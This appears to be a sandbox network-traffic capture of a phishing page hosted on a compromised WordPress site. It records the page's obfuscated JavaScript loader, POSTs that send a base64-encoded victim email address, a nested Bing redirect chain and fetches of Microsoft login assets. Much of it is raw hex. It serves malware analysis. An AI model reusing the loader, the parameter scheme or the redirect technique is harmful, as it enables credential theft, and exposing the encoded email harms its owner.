                                                                                                      Data Ascii: ZjN2ZhMDAzODEyM2YwMjY0YSIsImIiOiI3YTg3YjkzZDdlYmM2ZjM1YTkwMTlmMzdhNzBkMDI4ZDRjNzc5YzIyYzNjMDdmMWMyZDZkYWUwZjMxMmYzYjlhOWRmMjM3M2ExNDVkYjQwNjcwMTlmOTE4MGJkNTQ3Mzc0ODE4NDEyYmVhZDZiMmFjYjA5NWJiMmIzOTAyMDhkNTE3N2QyZmVlNmRlYTJhYjQwZWJhZTVhMTU0MWEwY2YwZjhkMjJlZ


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      17192.168.2.1649981192.243.110.54437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:38 UTC493OUTGET /wp-admin/maint/404.php?0-797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541-initial HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: */*
                                                                                                      Sec-Fetch-Site: none
                                                                                                      Sec-Fetch-Mode: cors
                                                                                                      Sec-Fetch-Dest: empty
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:38 UTC389INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/javascript;charset=UTF-8
                                                                                                      content-length: 2074
                                                                                                      date: Wed, 30 Oct 2024 16:13:38 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:38 UTC979INData Raw: 76 61 72 20 65 73 74 61 62 6c 69 73 68 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0d 0a 65 73 74 61 62 6c 69 73 68 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 73 72 63 22 2c 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 63 72 79 70 74 6f 2d 6a 73 2f 34 2e 30 2e 30 2f 63 72 79 70 74 6f 2d 6a 73 2e 6d 69 6e 2e 6a 73 22 29 3b 0d 0a 64 6f 63 75 6d 65 6e 74 2e 68 65 61 64 2e 61 70 70 65 6e 64 28 65 73 74 61 62 6c 69 73 68 29 3b 0d 0a 65 73 74 61 62 6c 69 73 68 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 0d 0a 76 61 72 20 7b 61 2c 62 2c 63 2c 64 7d 20 3d 20 4a 53 4f 4e 2e 70 61 72 73 65 28 61 74 6f 62 28 22 65 79
                                                                                                      Data Ascii: var establish= document.createElement("script");establish.setAttribute("src","https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js");document.head.append(establish);establish.onload=function(){var {a,b,c,d} = JSON.parse(atob("ey
                                                                                                      2024-10-30 16:13:38 UTC1095INData Raw: 4e 6c 4e 6a 63 34 4e 6d 55 34 59 54 6c 6c 4e 6a 42 6d 59 7a 6b 77 4f 47 51 30 4e 7a 49 33 59 54 59 32 5a 43 49 73 49 6d 49 69 4f 69 49 30 4e 44 42 68 5a 54 52 6a 4e 7a 45 31 4e 6a 63 30 4d 47 46 68 4d 32 49 79 59 7a 55 31 4d 7a 4d 7a 4f 57 5a 6b 4e 6d 5a 6d 5a 54 4e 6d 5a 6a 59 35 5a 54 46 6b 59 6d 4d 78 4f 54 46 6a 5a 47 5a 68 4e 6d 49 34 4d 57 4a 68 5a 54 64 6a 59 6d 45 7a 4d 7a 63 77 4d 54 4e 6b 4f 54 4d 78 4e 54 5a 68 4d 54 5a 69 59 32 46 6c 4e 7a 49 33 4d 44 49 35 5a 47 45 30 5a 6a 46 6b 4f 54 6b 33 4d 54 45 33 4d 7a 4d 30 59 54 55 77 4d 57 5a 69 4f 57 46 6c 59 54 68 6a 4d 7a 49 78 4d 7a 6b 32 5a 57 4a 68 4f 47 51 35 4d 7a 4a 69 59 32 55 35 59 6d 56 6a 4e 54 6b 78 59 6d 46 6c 4d 6a 4a 6d 5a 6d 51 32 5a 54 51 32 4d 32 56 6c 4f 47 46 6a 4d 54 6c 6d 5a
                                                                                                      Data Ascii: NlNjc4NmU4YTllNjBmYzkwOGQ0NzI3YTY2ZCIsImIiOiI0NDBhZTRjNzE1Njc0MGFhM2IyYzU1MzMzOWZkNmZmZTNmZjY5ZTFkYmMxOTFjZGZhNmI4MWJhZTdjYmEzMzcwMTNkOTMxNTZhMTZiY2FlNzI3MDI5ZGE0ZjFkOTk3MTE3MzM0YTUwMWZiOWFlYThjMzIxMzk2ZWJhOGQ5MzJiY2U5YmVjNTkxYmFlMjJmZmQ2ZTQ2M2VlOGFjMTlmZ


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      18192.168.2.1649982192.243.110.54437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:38 UTC778OUTPOST /wp-admin/maint/404.php HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      Content-Length: 169
                                                                                                      Cache-Control: max-age=0
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                      Origin: null
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                      Sec-Fetch-Dest: document
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:38 UTC169OUTData Raw: 63 6f 64 3d 37 39 37 39 36 37 37 30 34 62 35 33 36 39 33 32 33 30 37 34 36 34 35 30 37 61 36 33 36 62 37 33 35 33 35 35 33 30 37 32 34 63 36 33 33 37 34 64 37 61 33 39 34 64 37 32 35 34 37 34 35 32 34 63 37 61 37 33 32 66 35 36 35 34 33 38 36 63 34 66 35 34 34 38 34 63 35 38 37 61 33 38 37 38 34 63 35 33 36 31 33 33 35 31 37 39 37 39 36 61 34 61 37 61 35 31 34 35 34 31 26 65 3d 59 57 52 6c 63 6d 6c 6a 61 30 42 6b 5a 58 4a 70 59 32 74 6b 5a 58 4a 74 59 58 52 76 62 47 39 6e 65 53 35 6a 62 32 30 25 33 44
                                                                                                      Data Ascii: cod=797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541&e=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20%3D
                                                                                                      2024-10-30 16:13:38 UTC384INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      content-length: 2143
                                                                                                      date: Wed, 30 Oct 2024 16:13:38 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:38 UTC984INData Raw: 3c 68 74 6d 6c 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 73 74 79 6c 65 3e 62 6f 64 79 2c 68 74 6d 6c 7b 6d 61 72 67 69 6e 3a 33 30 70 78 3b
                                                                                                      Data Ascii: <html><head><meta name="robots" content="noindex, nofollow"><meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"><style>body,html{margin:30px;
                                                                                                      2024-10-30 16:13:38 UTC1159INData Raw: 74 68 2d 63 68 69 6c 64 28 34 29 20 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 31 34 34 6d 73 3b 7d 2e 63 6f 6e 74 72 61 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 34 29 3a 61 66 74 65 72 20 7b 74 6f 70 3a 20 37 32 70 78 3b 6c 65 66 74 3a 20 34 30 70 78 3b 7d 2e 63 6f 6e 74 72 61 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 20 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 31 38 30 6d 73 3b 7d 2e 63 6f 6e 74 72 61 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 35 29 3a 61 66 74 65 72 20 7b 74 6f 70 3a 20 37 31 70 78 3b 6c 65 66 74 3a 20 33 32 70 78 3b 7d 2e 63 6f 6e 74 72 61 63 74 20 64 69 76 3a 6e 74 68 2d 63 68 69 6c 64 28 36 29 20 7b 61 6e 69 6d 61 74 69 6f 6e 2d 64 65 6c 61 79 3a 20 2d 32 31 36 6d 73 3b
                                                                                                      Data Ascii: th-child(4) {animation-delay: -144ms;}.contract div:nth-child(4):after {top: 72px;left: 40px;}.contract div:nth-child(5) {animation-delay: -180ms;}.contract div:nth-child(5):after {top: 71px;left: 32px;}.contract div:nth-child(6) {animation-delay: -216ms;


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      19192.168.2.1649983192.243.110.54437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:38 UTC610OUTGET /favicon.ico HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                      Sec-Fetch-Dest: image
                                                                                                      Referer: https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:39 UTC434INHTTP/1.1 404 Not Found
                                                                                                      Connection: close
                                                                                                      cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                      pragma: no-cache
                                                                                                      content-type: text/html
                                                                                                      content-length: 1238
                                                                                                      date: Wed, 30 Oct 2024 16:13:39 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:39 UTC934INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s
                                                                                                      2024-10-30 16:13:39 UTC304INData Raw: 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20 61 20 77 65 62 20 68 6f 73 74 69 6e 67 20 63 6f 6d 70 61 6e 79 20 61 6e 64 2c 20 61 73 20 73 75 63 68 2c 20 68 61 73 20 6e 6f 20 63 6f 6e 74 72 6f 6c 20 6f 76 65 72 20 63 6f 6e
                                                                                                      Data Ascii: 5, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">LiteSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over con


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      20192.168.2.1649985192.243.110.54437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:42 UTC857OUTPOST /wp-admin/maint/404.php HTTP/1.1
                                                                                                      Host: clinicaaryal.com
                                                                                                      Connection: keep-alive
                                                                                                      Content-Length: 167
                                                                                                      Cache-Control: max-age=0
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                      Origin: https://clinicaaryal.com
                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Sec-Fetch-Site: same-origin
                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                      Sec-Fetch-Dest: document
                                                                                                      Referer: https://clinicaaryal.com/wp-admin/maint/404.php
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:42 UTC167OUTData Raw: 61 3d 37 39 37 39 36 37 37 30 34 62 35 33 36 39 33 32 33 30 37 34 36 34 35 30 37 61 36 33 36 62 37 33 35 33 35 35 33 30 37 32 34 63 36 33 33 37 34 64 37 61 33 39 34 64 37 32 35 34 37 34 35 32 34 63 37 61 37 33 32 66 35 36 35 34 33 38 36 63 34 66 35 34 34 38 34 63 35 38 37 61 33 38 37 38 34 63 35 33 36 31 33 33 35 31 37 39 37 39 36 61 34 61 37 61 35 31 34 35 34 31 26 62 3d 59 57 52 6c 63 6d 6c 6a 61 30 42 6b 5a 58 4a 70 59 32 74 6b 5a 58 4a 74 59 58 52 76 62 47 39 6e 65 53 35 6a 62 32 30 25 33 44
                                                                                                      Data Ascii: a=797967704b536932307464507a636b73535530724c63374d7a394d725474524c7a732f5654386c4f54484c587a38784c5361335179796a4a7a514541&b=YWRlcmlja0BkZXJpY2tkZXJtYXRvbG9neS5jb20%3D
                                                                                                      2024-10-30 16:13:42 UTC383INHTTP/1.1 200 OK
                                                                                                      Connection: close
                                                                                                      access-control-allow-origin: *
                                                                                                      content-type: text/html; charset=UTF-8
                                                                                                      content-length: 402
                                                                                                      date: Wed, 30 Oct 2024 16:13:42 GMT
                                                                                                      server: LiteSpeed
                                                                                                      vary: User-Agent
                                                                                                      alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                      2024-10-30 16:13:42 UTC402INData Raw: 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 22 68 74 74 70 73 3a 2f 2f 72 2e 67 2e 62 69 6e 67 2e 63 6f 6d 2f 62 61 6d 2f 61 63 3f 21 26 26 75 3d 61 31 61 48 52 30 63 48 4d 36 4c 79 39 79 4c 6d 63 75 59 6d 6c 75 5a 79 35 6a 62 32 30 76 59 6d 46 74 4c 32 46 6a 50 79 45 6d 4a 6e 55 39 59 54 46 68 53 46 49 77 59 30 68 4e 4e 6b 78 35 4f 58 6c 4d 62 57 4e 31 57 57 31 73 64 56 70 35 4e 57 70 69 4d 6a 42 32 57 57 31 47 64 45 77 79 52 6d 70 51 65 55 56 74 53 6d 35 56 4f 56 6c 55 52 6d 68 54 52 6b 6c 33 57 54 42 6f 54 6b 35 72 65 44 56 50 56 33 68 70 55 6a 4a 33 64 31 64 73 5a 47 46 4e 56 30 31 35 59 6b 68 61 61 57 46 55 56 6a 5a 58 56 6b 30 78 59 57 31 4a 65 55 31 49 57 6d 46 53 4d 31 4a 76 56 31 64 30
                                                                                                      Data Ascii: <script>window.top.location.href = "https://r.g.bing.com/bam/ac?!&&u=a1aHR0cHM6Ly9yLmcuYmluZy5jb20vYmFtL2FjPyEmJnU9YTFhSFIwY0hNNkx5OXlMbWN1WW1sdVp5NWpiMjB2WW1GdEwyRmpQeUVtSm5VOVlURmhTRkl3WTBoTk5reDVPV3hpUjJ3d1dsZGFNV015YkhaaWFUVjZXVk0xYW1JeU1IWmFSM1JvV1d0


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      21192.168.2.165000313.107.246.454437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:49 UTC710OUTGET /instrument/cookieenabled HTTP/1.1
                                                                                                      Host: 3pcookiecheck.azureedge.net
                                                                                                      Connection: keep-alive
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Upgrade-Insecure-Requests: 1
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                      Sec-Fetch-Mode: navigate
                                                                                                      Sec-Fetch-Dest: iframe
                                                                                                      Referer: https://www.bing.com/
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:49 UTC386INHTTP/1.1 409 Public access is not permitted on this storage account.
                                                                                                      Date: Wed, 30 Oct 2024 16:13:49 GMT
                                                                                                      Content-Type: application/xml
                                                                                                      Content-Length: 248
                                                                                                      Connection: close
                                                                                                      x-ms-request-id: c12ba97e-701e-0008-30e6-2a6bd2000000
                                                                                                      x-ms-version: 2009-09-19
                                                                                                      x-azure-ref: 20241030T161349Z-16849878b78qg9mlz11wgn0wcc00000007ug00000000k5pa
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_MISS
                                                                                                      2024-10-30 16:13:49 UTC248INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 45 72 72 6f 72 3e 3c 43 6f 64 65 3e 50 75 62 6c 69 63 41 63 63 65 73 73 4e 6f 74 50 65 72 6d 69 74 74 65 64 3c 2f 43 6f 64 65 3e 3c 4d 65 73 73 61 67 65 3e 50 75 62 6c 69 63 20 61 63 63 65 73 73 20 69 73 20 6e 6f 74 20 70 65 72 6d 69 74 74 65 64 20 6f 6e 20 74 68 69 73 20 73 74 6f 72 61 67 65 20 61 63 63 6f 75 6e 74 2e 0a 52 65 71 75 65 73 74 49 64 3a 63 31 32 62 61 39 37 65 2d 37 30 31 65 2d 30 30 30 38 2d 33 30 65 36 2d 32 61 36 62 64 32 30 30 30 30 30 30 0a 54 69 6d 65 3a 32 30 32 34 2d 31 30 2d 33 30 54 31 36 3a 31 33 3a 34 39 2e 33 34 37 31 39 38 37 5a 3c 2f 4d 65 73 73 61 67 65 3e 3c 2f 45 72 72 6f 72 3e
                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><Error><Code>PublicAccessNotPermitted</Code><Message>Public access is not permitted on this storage account.RequestId:c12ba97e-701e-0008-30e6-2a6bd2000000Time:2024-10-30T16:13:49.3471987Z</Message></Error>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      22192.168.2.165003013.107.246.454437792C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      2024-10-30 16:13:50 UTC633OUTGET /shared/1.0/content/js/BssoInterrupt_Core_zKox_QMcTIVut7mG_Z9Eew2.js HTTP/1.1
                                                                                                      Host: aadcdn.msauth.net
                                                                                                      Connection: keep-alive
                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                      Origin: https://login.microsoftonline.com
                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                      Accept: */*
                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                      Sec-Fetch-Mode: cors
                                                                                                      Sec-Fetch-Dest: script
                                                                                                      Referer: https://login.microsoftonline.com/
                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                      2024-10-30 16:13:50 UTC791INHTTP/1.1 200 OK
                                                                                                      Date: Wed, 30 Oct 2024 16:13:50 GMT
                                                                                                      Content-Type: application/x-javascript
                                                                                                      Content-Length: 49911
                                                                                                      Connection: close
                                                                                                      Cache-Control: public, max-age=31536000
                                                                                                      Content-Encoding: gzip
                                                                                                      Last-Modified: Wed, 02 Oct 2024 20:05:23 GMT
                                                                                                      ETag: 0x8DCE31D8CF87EF9
                                                                                                      x-ms-request-id: 58e2db8b-901e-0046-32a9-27f7d1000000
                                                                                                      x-ms-version: 2009-09-19
                                                                                                      x-ms-lease-status: unlocked
                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                      Access-Control-Expose-Headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                      Access-Control-Allow-Origin: *
                                                                                                      x-azure-ref: 20241030T161350Z-16849878b78xblwksrnkakc08w00000007d000000000w89w
                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                      X-Cache: TCP_HIT
                                                                                                      Accept-Ranges: bytes
                                                                                                      2024-10-30 16:13:50 UTC15593INData Raw: 1f 8b 08 00 00 00 00 00 04 00 e4 bd 6d 5b e3 38 d2 30 fa fd fe 15 c1 bb 0f 1d 4f 4c c8 0b d0 e0 b4 3b 77 1a d2 dd cc 00 61 08 cc cc 2e b0 5c 4e ac 80 bb 83 9d b5 1d 68 06 72 7e fb a9 17 c9 96 1d 87 ee d9 3d d7 f9 f2 cc 0b b1 a5 92 2c 95 aa 4a 55 a5 92 b4 f9 d3 da ff 54 7e aa 6c fc f8 3f 95 e1 79 ef ec bc 32 f8 58 39 ff 7c 78 76 50 39 85 b7 7f 54 4e 06 e7 87 fb fd 1f af 07 3f 8a ff 9f df f9 71 65 e2 4f 45 05 7e 47 6e 2c bc 4a 18 54 c2 a8 e2 07 e3 30 9a 85 91 9b 88 b8 72 0f 7f 23 df 9d 56 26 51 78 5f 49 ee 44 65 16 85 5f c4 38 89 2b 53 3f 4e a0 d0 48 4c c3 c7 4a 15 aa 8b bc ca a9 1b 25 4f 95 c3 53 b3 0e f5 0b a8 cd bf f5 03 28 3d 0e 67 4f f0 7c 97 54 82 30 f1 c7 a2 e2 06 1e d5 36 85 97 20 16 95 79 e0 89 a8 f2 78 e7 8f ef 2a c7 fe 38 0a e3 70 92 54 22 31 16
                                                                                                      Data Ascii: m[80OL;wa.\Nhr~=,JUT~l?y2X9|xvP9TN?qeOE~Gn,JT0r#V&Qx_IDe_8+S?NHLJ%OS(=gO|T06 yx*8pT"1
                                                                                                      2024-10-30 16:13:50 UTC16384INData Raw: 02 a2 23 27 68 d7 13 77 83 5b ce 75 c8 5d 1e 38 7e d8 ef 65 93 b7 51 ba 99 a3 99 6e c4 c1 49 25 dd 80 44 6f 6d d6 5b f8 24 0d de 5f 42 cf db 25 c7 07 20 5b 70 93 25 fa 4a f2 b1 09 72 79 ab 24 b3 29 e5 95 16 1b 3c 9b e3 f6 1e bc 63 2b a7 73 9c 09 3c 7b 87 34 0e 7c c0 b3 7e cf c4 83 50 e7 60 ac d8 21 42 fd 4d eb 90 1b 4e 38 90 99 77 8e e0 d0 a6 2f bd 49 a2 b4 57 da 5c 87 87 25 cd 61 58 8e c4 2d 4e ad 5b 1a 28 47 10 3f 31 5a 3e 44 bc 65 2b c5 c3 87 fc 45 47 b6 f1 b7 8f bd 8f 7b 1f 77 8d bc 52 c5 f3 16 77 73 08 e5 a7 d2 38 b4 8d 58 7b 03 2e 80 2a 7d 95 75 9f bd f0 3c 9d e0 69 54 92 0e 40 a4 ab 30 9c 54 f3 53 f3 32 8c 02 fa 7d e9 16 60 90 4a da 17 b0 b9 c2 43 2e b7 f6 3f 0c ce 10 8a e3 b7 49 a4 a8 49 28 d5 0d 41 59 e3 36 4b e1 be dd c8 64 fa 76 93 fc 38 74 6a
                                                                                                      Data Ascii: #'hw[u]8~eQnI%Dom[$_B% [p%Jry$)<c+s<{4|~P`!BMN8w/IW\%aX-N[(G?1Z>De+EG{wRws8X{.*}u<iT@0TS2}`JC.?II(AY6Kdv8tj
